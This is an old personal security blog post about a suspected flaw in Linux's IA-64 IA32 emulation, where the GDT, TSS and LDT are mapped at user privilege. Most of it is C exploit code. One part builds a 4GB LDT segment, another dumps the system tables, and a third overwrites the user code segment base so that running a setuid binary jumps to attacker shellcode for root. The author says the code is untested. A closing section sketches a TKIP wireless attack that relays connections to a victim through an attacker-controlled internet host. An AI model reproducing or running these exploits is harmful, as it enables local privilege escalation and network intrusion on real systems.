/* * Map GDT below 4GB, where the processor can find it. We need to map * it with privilege level 3 because the IVE uses non-privileged accesses to these * tables. IA-32 segmentation is used to protect against IA-32 accesses to them. */
(added 11/10/2009)
This posting is to clear a backlog of things I've been meaning to post at some stage. They're mostly unfinished due to a lack of motivation.. but here goes:
(started around 23/5/2008)
While recently doing some random research, I was browsing the linux 2.6.25.2 kernel source, in arch/ia64/ia32/. While I was reading over the binfmt_elf32.c file, I stumbled across an interesting comment in the function ia64_elf32_init():
/* * Map GDT below 4GB, where the processor can find it. We need to map * it with privilege level 3 because the IVE uses non-privileged accesses to these * tables. IA-32 segmentation is used to protect against IA-32 accesses to them. */
I thought it was particularly interesting in how they mentioned that segmentation would be used to protect access and modification of the applicable data.
Please keep in mind that I don't have an IA64 box to test this on, so it's currently speculation based on what information I can gather. If you do have a IA64 with IA32 linux emulation feel free to test and report back to me, I'd be interested in finding out :)
The code seems to lay memory out with a 3GB, with a couple of pages above the 3GB mark for GDT, LDT, and TSS.
From the ia32priv.h file, we have:
#define IA32_STACK_TOP IA32_PAGE_OFFSET #define IA32_GATE_OFFSET IA32_PAGE_OFFSET #define IA32_GATE_END IA32_PAGE_OFFSET + PAGE_SIZE /* * The system segments (GDT, TSS, LDT) have to be mapped below 4GB so the * IA-32 engine can * access them. */ #define IA32_GDT_OFFSET (IA32_PAGE_OFFSET + PAGE_SIZE) #define IA32_TSS_OFFSET (IA32_PAGE_OFFSET + 2*PAGE_SIZE) #define IA32_LDT_OFFSET (IA32_PAGE_OFFSET + 3*PAGE_SIZE)
Where IA32_PAGE_OFFSET #define'd to 0xc0000000 in include/asm-ia64/ia32.h.
There appears to be several ways we can access the data. The easiest is probably via the standard system calls that take a pointer and uses it in way, such as read() or write(). Additionally, we can directly modify the data via creating a new descriptor and setting the limit to 4GB (which can be done via the modify_ldt() syscall).
Using the read() / write() mechanism is probably the best way to manipulate the data, and probably most flexible.
Creating a new descriptor is easy enough, the below code shows how to:
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <asm/ldt.h>
#include <stdio.h>
#define TYPE user_desc // modify_ldt_ldt_s for 2.4
int do_ldt(int num, unsigned long base, int type)
{
struct TYPE ldt_entry = {
num, // entry_number
(unsigned long int) (base), // base_address
0xfffff, // limit, 4G
1, // seg_32bit
type, // contents
0, // read_exec_only
1, // limit_in_pages
0, // seg_not_present
1 // usable
};
return modify_ldt(1, &ldt_entry, sizeof(struct TYPE)) == 0;
}
int main(int argc, char **argv)
{
if(do_ldt(0, 0, MODIFY_LDT_CONTENTS_DATA) == 0) {
printf("Failed to modify the ldt\n");
exit(EXIT_FAILURE);
}
// the new segment will be accessible via 0x07, (0 * 8) | user priv | ldt etc.
__asm__ volatile("pushw $7;\
popw %ds;");
printf("We've changed our ds segment descriptor\n");
}
If the above code is being compiled on a 2.4 kernel, the struct user_desc will need to be changed to struct modify_ldt_ldt_s, which can be done via changing the TYPE define above. This should allow direct access according to the comment above. Make sure it's compiled in 32 bit mode, and appropriate emulation options/modules are active.
The code in 2.6.25.2 doesn't do any checking in what memory is now accessible in ia32_ldt.c → write_ldt() function.
I'd like to repeat again that I don't have access to a IA64 box to test this out, but I'm going to attempt to write a couple of proof of concept exploits. Let me know if it works :)
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#define PAGE_SIZE 4096
#define IA32_PAGE_OFFSET 0xc0000000
//#define IA32_PAGE_OFFSET (x == 0 ? x = malloc(4 * 4096) : x)
#define IA32_STACK_TOP IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET IA32_PAGE_OFFSET
#define IA32_GATE_END IA32_PAGE_OFFSET + PAGE_SIZE
#define IA32_GDT_OFFSET (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET (IA32_PAGE_OFFSET + 3*PAGE_SIZE)
unsigned char *x;
int main(int argc, char **argv)
{
int fd;
fd = open("gdt.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
if(fd == -1) {
printf("Failed to open gdt.bin: %m\n");
exit(EXIT_FAILURE);
}
if(write(fd, IA32_GDT_OFFSET, 4096) != 4096) {
printf("Failed to write() 4096 bytes\n");
exit(EXIT_FAILURE);
}
close(fd);
printf("Dumped GDT\n");
fd = open("tss.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
if(fd == -1) {
printf("Failed to open tss.bin: %m\n");
exit(EXIT_FAILURE);
}
if(write(fd, IA32_TSS_OFFSET, 4096) != 4096) {
printf("Failed to write() 4096 bytes\n");
exit(EXIT_FAILURE);
}
close(fd);
printf("Dumped TSS\n");
fd = open("ldt.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
if(fd == -1) {
printf("Failed to open ldt.bin: %m\n");
exit(EXIT_FAILURE);
}
if(write(fd, IA32_LDT_OFFSET, 4096) != 4096) {
printf("Failed to write() 4096 bytes\n");
exit(EXIT_FAILURE);
}
close(fd);
printf("Dumped LDT\n");
}
After thinking about it a little bit, there may be little point in getting ring0 itself, but I haven't completely read through the itanium manuals.
According to the docs I've read so far, io ports need to be explicitly mapped in by the operating system, and enabled. Other "privileged" instructions generate traps.
If ring0 would be useful in some capacity, it could be gained by setting appropriate LDT entries if needed, and overwriting the TSS saved CS register and modifying the privilege level.
However, there would be a way to gain additional privileges if there exists a setuid root x86 binary installed on the system. This would be done via manipulating the GDT base address so that upon execve() of a suid process, the entry point would end up pointing to custom code (probably on the stack), due to segmentation base. From what I've read of the itanium manual, segmentation is used to calculate the real address it accesses (ala x86)
Setting the GDT base would also have the side effect of probably crashing any existing IA32 processes.
Theory:
Calculate where the initial entry point is going to be
Calculate where our stack arguments are going to be
Or a suitable .text / library code location
Modify the GDT base value for USER_CS
Execute a setuid x86 binary.
Randomisation probably won't be an issue due to the personality() syscall :)
Initial entry point will be the entry point in the binary if it's not dynamically linked, if it's dynamic linked, the loaders initial entry point will be the entry point.
Here's some sample code I came up with; I don't know if it works or not since I don't have access to the architecture to test. Don't forget to compile in 32bit mode (-m32 may suffice). If your compiler doesn't generate suitable binaries, compile on a x86 box.
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#define PAGE_SIZE 4096
#define IA32_PAGE_OFFSET 0xc0000000
//#define IA32_PAGE_OFFSET (x == 0 ? x = malloc(4 * 4096) : x)
#define IA32_STACK_TOP IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET IA32_PAGE_OFFSET
#define IA32_GATE_END IA32_PAGE_OFFSET + PAGE_SIZE
#define IA32_GDT_OFFSET (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET (IA32_PAGE_OFFSET + 3*PAGE_SIZE)
#define __USER_CS 0x23
#define __USER_DS 0x2B
unsigned char *x;
/* borrowed from arch/ia64/ia32/ia32priv.h */
#define IA32_PAGE_SHIFT 12 /* 4KB pages */
#define __USER_CS 0x23
#define __USER_DS 0x2B
#define IA32_SEG_BASE 16
#define IA32_SEG_TYPE 40
#define IA32_SEG_SYS 44
#define IA32_SEG_DPL 45
#define IA32_SEG_P 47
#define IA32_SEG_HIGH_LIMIT 48
#define IA32_SEG_AVL 52
#define IA32_SEG_DB 54
#define IA32_SEG_G 55
#define IA32_SEG_HIGH_BASE 56
#define IA32_SEG_DESCRIPTOR(base, limit, segtype, nonsysseg, dpl, segpresent, avl, segdb, gran) \
(((limit) & 0xffff) \
| (((unsigned long) (base) & 0xffffff) << IA32_SEG_BASE) \
| ((unsigned long) (segtype) << IA32_SEG_TYPE) \
| ((unsigned long) (nonsysseg) << IA32_SEG_SYS) \
| ((unsigned long) (dpl) << IA32_SEG_DPL) \
| ((unsigned long) (segpresent) << IA32_SEG_P) \
| ((((unsigned long) (limit) >> 16) & 0xf) << IA32_SEG_HIGH_LIMIT) \
| ((unsigned long) (avl) << IA32_SEG_AVL) \
| ((unsigned long) (segdb) << IA32_SEG_DB) \
| ((unsigned long) (gran) << IA32_SEG_G) \
| ((((unsigned long) (base) >> 24) & 0xff) << IA32_SEG_HIGH_BASE))
/* </borrowed> */
int main(int argc, char **argv)
{
int fd;
unsigned char scratch[4096];
unsigned long long *gdt = (unsigned long *)(scratch);
unsigned long long entry_point;
if(argc != 2) {
printf("%s <gdt offset>\n", argv[0] ? argv[0] : ";PpP");
printf("--> 0xbfffe000 (or wherever your r00tc0de is- <libc entry point> = offset, i think ;p\n");
printf("--> offset probably needs to be aligned so it can be shifted\n");
printf("--> in hex\n");
exit(EXIT_FAILURE);
}
entry_point = strtoul(argv[1], 0, 16);
fd = open("gdt.bin", O_RDWR|O_TRUNC|O_CREAT, 0600);
unlink("gdt.bin");
if(fd == -1) {
printf("Failed to open gdt.bin: %m\n");
exit(EXIT_FAILURE);
}
if(write(fd, IA32_GDT_OFFSET, 4096) != 4096) {
printf("Failed to write() 4096 bytes\n");
exit(EXIT_FAILURE);
}
printf("--> Dumped GDT\n");
if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
printf("Unable to seek to start of fd\n");
exit(EXIT_FAILURE);
}
if(read(fd, scratch, 4096) != 4096) {
printf("Unable to read 4096 bytes from our fd\n");
exit(EXIT_FAILURE);
}
if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
printf("Unable to seek to start of fd\n");
exit(EXIT_FAILURE);
}
// borrowed from ia32_support.c :P, but modified
gdt[__USER_CS >> 3] = IA32_SEG_DESCRIPTOR(entry_point, (IA32_GATE_END-1) >> IA32_PAGE_SHIFT,
0xb, 1, 3, 1, 1, 1, 1);
if(write(fd, scratch, 4096) != 4096) {
printf("Unable to write modified data back\n");
exit(EXIT_FAILURE);
}
if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
printf("Unable to seek backwards\n");
exit(EXIT_FAILURE);
}
printf("--> If things go well, then this should crash once read() returns to userspace. If not, hmm! maybe we moved to another processor afterwards or so?\n");
if(read(fd, IA32_GDT_OFFSET, 4096) != 4096) {
printf("Failed to read() 4096 bytes :(\n");
exit(EXIT_FAILURE);
}
printf("Hrm. It worked. but it hasn't crashed. Maybe re-run a couple of times? Maybe I've missed something?\n");
close(fd);
}
At any rate, spender tested the code up to dumping GDT, which goes to show it can be accessed, and presumably modified (I suspect you could mprotect() if it is made read only at some stage).
At any rate, I haven't been able to test due to lack of access to hardware :p
(started 14/12/2008)
When the TKIP flaw came to light (which allowed you to send a couple of packets to a client station), I played around with the idea of using an attacker controlled machine on the internet to help "conspire" against the client station.
By using the UIP TCP/IP stack, I wrote a program to help attack the client by the following means:
Wireless attacker -> Does TKIP attack, can send some packets to client machine
Wireless attacker -> Sends SYN packets to client machine on "common"
vulnerable ports (139/445/80/23/etc), with source IP of
an internet machine we control
Internet Machine -> Looks for SYN|ACK packets, if found, sets up a suitable
UIP connection structure, and fixes up the seq/ack
numbers. Machine then creates a local socket, and buffers
the data between local socket, and UIP connection to the
attacked machine.
Wireless attacker -> Can then attack the client machine with a bunch of
standard exploits
This type of attack is highly dependant on the network infrastructure in use.. outgoing SYN|ACK's may not be NAT'd properly in NAT environments (due to no incoming SYN seen), firewalls may not allow outgoing connections, with an additional complication that the client attacked may have a firewall enabled, etc.